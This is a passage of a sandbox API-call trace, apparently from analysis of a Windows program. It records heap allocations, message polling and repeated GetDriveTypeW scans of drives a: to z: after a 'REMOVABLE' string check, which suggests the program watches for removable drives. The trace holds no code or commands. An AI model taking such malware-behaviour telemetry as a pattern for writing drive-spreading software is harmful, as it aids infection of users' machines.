lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.995] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0218.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0218.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0218.995] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0218.995] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.996] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.996] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0218.996] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.996] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.996] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.996] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.996] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0218.996] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.996] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.996] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.996] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.996] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.997] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.997] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.997] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.997] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.997] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.997] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.997] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.998] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.998] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.998] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.998] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.999] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.999] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.999] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.999] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.999] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.999] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.999] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.000] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.000] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.000] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.000] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.000] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.000] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.001] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0219.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.001] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0219.001] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0219.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0219.001] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fa0 [0219.002] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fa0 | out: hHeap=0x12c0000) returned 1 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0219.002] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0219.002] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0219.002] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.002] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.002] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.002] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.002] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.002] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.002] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.002] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.003] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.003] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0219.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.003] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.003] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.003] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.003] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.003] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.003] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.004] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.004] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.004] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.004] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.004] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.004] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.005] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.005] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.005] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.005] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.005] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.005] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.006] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.006] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.006] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.006] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.006] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.006] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.007] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.007] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.007] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.007] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.007] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.007] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.008] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.008] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.008] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.008] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.008] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.008] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0219.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.008] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.008] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.008] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.008] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.008] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.008] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.008] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.008] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325ea0 [0219.009] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325ea0 | out: hHeap=0x12c0000) returned 1 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.009] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0219.009] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0219.009] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.009] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.009] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.009] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.009] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.009] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.009] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.009] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.010] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0219.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.010] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0219.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0219.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0219.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.010] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.018] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.041] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.041] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.041] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.041] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.041] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.042] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.042] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.042] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.042] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.042] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.043] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.043] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.043] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.043] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.043] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.044] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.044] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.044] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.044] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.045] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.045] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.045] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.045] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.046] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.046] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 